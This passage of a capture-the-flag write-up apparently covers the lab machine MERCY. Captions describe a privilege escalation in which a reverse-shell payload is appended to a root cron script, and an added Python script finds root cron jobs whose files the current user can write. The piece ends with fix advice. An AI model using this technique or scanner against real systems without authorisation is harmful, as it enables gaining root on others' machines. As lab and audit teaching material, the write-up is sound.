![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcTsPaTErqOugkdzhdUl3GHXNhaIhyB4_Xp1cnkYLatXJ7cu2aOgiB55kZOJSLAAJFy5VDq8-jpfhPAxbtejdRWsv6FHQ8XDRuY9gAKTAp_j-Nhi_OdBH6UrRuqIggFrhhOct1Mx8Hzaar/s1600/screenshot.61.jpg)
- Generating a reverse-shell payload with msfvenom:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEH_9orFIpPw0epBT-0xJPzWNs3eAM53zZOW1XncGevQ88jEPU_jlywj-Mmj0ghVvZ47Pfp6FyeM1oUkFlrTgn8nCUkaIr5gPOYkTfFCiznbVHOmsHodo_Xb7Ms92uI8NMpONT0E6CIlW0/s1600/screenshot.57.jpg)
- Setting a Netcat listener:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbXCeEHax0xkODWsp3uhc-aPcvcKtLkp0NQqlLXe5YbCd7ZZoFINgKTjZSZBKxxnenBZW73RVTk2unqziufajUk2OL-mmYJjQ5gWhblMRDn16s4qJC1CRm_Db3GmqOY89_hResusIndS78/s320/screenshot.60.jpg)
- Appending the payload to timeclock:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjggbmgUqv-3rkdVP6RmCTOcaEQOOUhFKD9acBrGgr-6ifuhP3SaLG4W9bXmU5TEalDXaDoMTQgKAo0aTUKMzQv2yGtL5kx2USku4wrNZQVVwbNFAMpat6k1CILKtMb_TDl-8IAK8rhx3zE/s1600/screenshot.58.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFokVDvZmJj4mbPuc2hw9mrDuGZS1ApSftXxW84QHIPVQaA67uKNNbxLKydGvU9tR6byaH9roAGVlkpcgiqppJJYohMOH-8quzUeTzhZXVYHxOOGX3QXU3ckKWzdcN6y58dKGraxolI4su/s1600/screenshot.59.jpg)
- After a few minutes the scheduled job runs the modified script and the listener receives a root shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9UXFGvt9gT-TsKkia1XaEVNB1yRP51lr1nttuWTaLIJrkylg4GJAwxzqpvfI1ngOxru7dOzAJu9vaP-ZAd9pJY6nUo_By8WYpKtAi6JHfGn8iMyj7kpGy1lWK2oywfFJRIIqT2ifeAI9e/s1600/screenshot.62.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZE5r9WnQFDR7IX9PWVndH2BWqinMdbovosuf1p5TwDSI9hSxPDtx2nzM9nQBejop5YvVcyyXkqqO-S0P0Cj4HwJ6j1wuCXIqcNjFJM9FO3apDv-Zv3QkOD01tLAIkdVGxN6aE2iDW1Mto/s1600/screenshot.63.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQwte_do6UR90xHRb2dMmvYM3vFPbvhXQvF37J_vMoRJHI8dDs40k4vZxuN40A2b_4TAVnRUwxR7gfm7mIbau78BaZqKTcEdQeDqhLGzdEj3e-6Y34OPdrWkQWe7jY0LIRD7lo1FH9bB7R/s1600/screenshot.64.jpg)
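The escalation above relies on a root cron job executing a script that an unprivileged user can modify. Rather than finding such a script by browsing home directories, the following Python helper looks for the pattern directly in the system crontabs. It is an added example, not code from the write-up; the crontab text at the bottom is constructed sample data and the path /opt/timeclock in it is a placeholder, not the location of the script on MERCY.

```python
"""Find root cron jobs whose command references a path the current user can
write. Added example, not part of the original write-up."""
import glob
import os
import shlex
from typing import Callable, Iterator, List, Tuple


def parse_system_crontab(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (user, command) for each job in a system-style crontab
    (/etc/crontab and /etc/cron.d/*), which carry a user field that per-user
    crontabs lack. Blank lines, comments and VAR=value lines are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:                 # environment assignment, e.g. PATH=...
            continue
        if first.startswith("@"):        # @reboot / @daily ...: spec user command
            parts = line.split(None, 2)
            if len(parts) == 3:
                yield parts[1], parts[2]
            continue
        parts = line.split(None, 6)      # m h dom mon dow user command
        if len(parts) == 7:
            yield parts[5], parts[6]


def absolute_paths(command: str) -> List[str]:
    """Absolute paths named in a cron command line (the script it runs, files
    it reads); "/" on its own is ignored."""
    try:
        tokens = shlex.split(command)
    except ValueError:                   # unbalanced quotes: fall back to whitespace split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/") and t != "/"]


def writable_root_jobs(crontab_text: str,
                       is_writable: Callable[[str], bool] = lambda p: os.access(p, os.W_OK),
                       ) -> List[Tuple[str, str, str]]:
    """(user, writable_path, command) for every root job that touches a path
    the current user can write. `is_writable` is injectable for offline tests."""
    findings: List[Tuple[str, str, str]] = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in absolute_paths(command):
            if is_writable(path):
                findings.append((user, path, command))
    return findings


def scan_host() -> List[Tuple[str, str, str]]:
    """Run against the live system: /etc/crontab plus everything in /etc/cron.d.
    Per-user crontabs under /var/spool/cron are root-only and are not covered."""
    findings: List[Tuple[str, str, str]] = []
    for cron_file in ["/etc/crontab"] + sorted(glob.glob("/etc/cron.d/*")):
        try:
            with open(cron_file) as fh:
                findings += writable_root_jobs(fh.read())
        except OSError:
            pass                         # unreadable or missing: skip
    return findings


# Constructed sample (not MERCY's crontab); /opt/timeclock is a placeholder path.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /opt/timeclock
@reboot         root    /usr/local/bin/startup.sh --quiet
0 3     * * *   www-data /var/www/cleanup.sh
"""

if __name__ == "__main__":
    for user, path, command in scan_host():
        print(f"{user} runs {command!r}; {path} is writable by us")
```

A writable parent directory is just as bad (the script can be replaced outright), and a job that runs `run-parts` over a writable directory lets you drop a new script rather than edit one; the fix in all cases is the same: scripts executed by root's cron must be owned by root and not writable by anyone else.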
6 - CAPTURING THE FLAG
- Reading proof.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_Au5OdlKTOuoekz9KtX0O3PA4oVXQOd-rhM7ZrL5EABU2usbw0kA_EWyFKxhH07rVujr5hsg9nDNTEBP7xLDIJkxiOPw9SfToJYVwjjRtwrJDsL3MlnWdN4hareQvW9rrphaXenR37FVB/s1600/screenshot.65.jpg)